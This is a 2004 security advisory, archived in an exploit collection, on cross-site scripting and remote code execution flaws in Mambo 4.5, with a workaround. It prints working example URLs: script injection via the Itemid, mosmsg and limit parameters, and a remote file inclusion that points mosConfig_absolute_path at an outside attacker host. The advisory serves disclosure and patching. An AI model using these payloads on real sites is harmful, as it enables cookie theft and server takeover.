home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / mambo / mambo45.jose.txt < prev    next >
Text File  |  2005-02-12  |  3KB  |  134 lines

  1.  
  2.  
  3. --------------------------------------------------------------------------- 
  4.               Two Vulnerabilities in Mambo 
  5. --------------------------------------------------------------------------- 
  6.  
  7. Author: Jose Antonio Coret (Joxean Koret) 
  8. Date: 2004  
  9. Location: Basque Country 
  10.  
  11. --------------------------------------------------------------------------- 
  12.  
  13. Affected software description: 
  14. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  15.  
  16. Mambo 4.5 (1.0.9) 
  17.  
  18. Mambo is one of the most powerful Open 
  19. Source Content Management Systems on  
  20. the planet. It is used all over the world for 
  21. everything from simple websites  
  22. to complex corporate applications. Mambo is 
  23. easy to install, simple to manage,  
  24. and reliable. 
  25.  
  26. Web : http://mamboserver.com/ 
  27.  
  28. --------------------------------------------------------------------------- 
  29.  
  30. Vulnerabilities: 
  31. ~~~~~~~~~~~~~~~~ 
  32.  
  33. A. Cross Site Scripting 
  34.  
  35. A1. The first vulnerability that I found is in the 
  36. script index.php. The following 
  37. parameters are vulnerables : Itemid, mosmsg 
  38. and limit. 
  39.  
  40. Examples :  
  41.  
  42. http://<site-with-mambo>/index.php?option=com_content&task=view&id=18&Itemid=39"><script>alert(document.cookie)</script>&mosmsg=<h1>Hi,
  43. %20I%20am%20an%20XSS%
  44. 20Problem</h1><br><br><br><br><br><br><br><br><br><br><br><br><br><br> 
  45.  
  46. http://<site-with-mambo>/index.php?option=com_content&task=view&id=15&Itemid=2&limit=1"><script>alert(document.cookie)</script>&limitstart=1 
  47.  
  48. B. Remote Code Execution 
  49.  
  50. B1. The simple hack made to the Cache_library 
  51. makes mambo vulnerable to a 
  52. remote arbitrary code execution attacks.  
  53.  
  54. Example :  
  55.  
  56. http://<site-with-mambo>/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://fucking.site.com/ 
  57.  
  58. Workaround: 
  59. ~~~~~~~~~~~ 
  60.  
  61. The file 
  62. mambo/includes/Cache/Lite/Function.php looks 
  63. like : 
  64.  
  65. <?php 
  66.  
  67. /** 
  68. * This class extends Cache_Lite and can be 
  69. used to cache the result and output of 
  70. functions/methods 
  71. * This class is completly inspired from 
  72. Sebastian Bergmann's 
  73. * PEAR/Cache_Function class. This is only an 
  74. adaptation to 
  75. * Cache_Lite 
  76. * There are some examples in the 
  77. 'docs/examples' file 
  78. * Technical choices are described in the 
  79. 'docs/technical' file 
  80. * @package Cache_Lite 
  81. * @version $Id: Function.php,v 1.1 2004/07/21 
  82. 13:38:58 rcastley Exp $ 
  83. * @author Sebastian BERGMANN 
  84. <sb@sebastian-bergmann.de> 
  85. * @author Fabien MARTY <fab@php.net> 
  86. */ 
  87.  
  88. require_once($mosConfig_absolute_path . 
  89. '/includes/Cache/Lite.php'); 
  90.  
  91. class Cache_Lite_Function extends Cache_Lite 
  92. ... 
  93.  
  94.  
  95. Simply add the following 2 lines before the 
  96. require_once statement :  
  97.  
  98. /** ensure this file is being included by a parent 
  99. file */ 
  100. defined( '_VALID_MOS' ) or die( 'Direct Access to 
  101. this location is not allowed.' ); 
  102.  
  103. The fix: 
  104. ~~~~~~~~ 
  105.  
  106. The bugs are fixed in the CVS version. 
  107.  
  108. Disclaimer: 
  109. ~~~~~~~~~~~ 
  110.  
  111. The information in this advisory and any of its 
  112. demonstrations is provided 
  113. "as is" without any warranty of any kind. 
  114.  
  115. I am not liable for any direct or indirect damages 
  116. caused as a result of 
  117. using the information or demonstrations 
  118. provided in any part of this 
  119. advisory.  
  120.  
  121. --------------------------------------------------------------------------- 
  122.  
  123. Contact: 
  124. ~~~~~~~~ 
  125.  
  126.     Joxean Koret at 
  127. joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es 
  128.  
  129.  
  130.  
  131.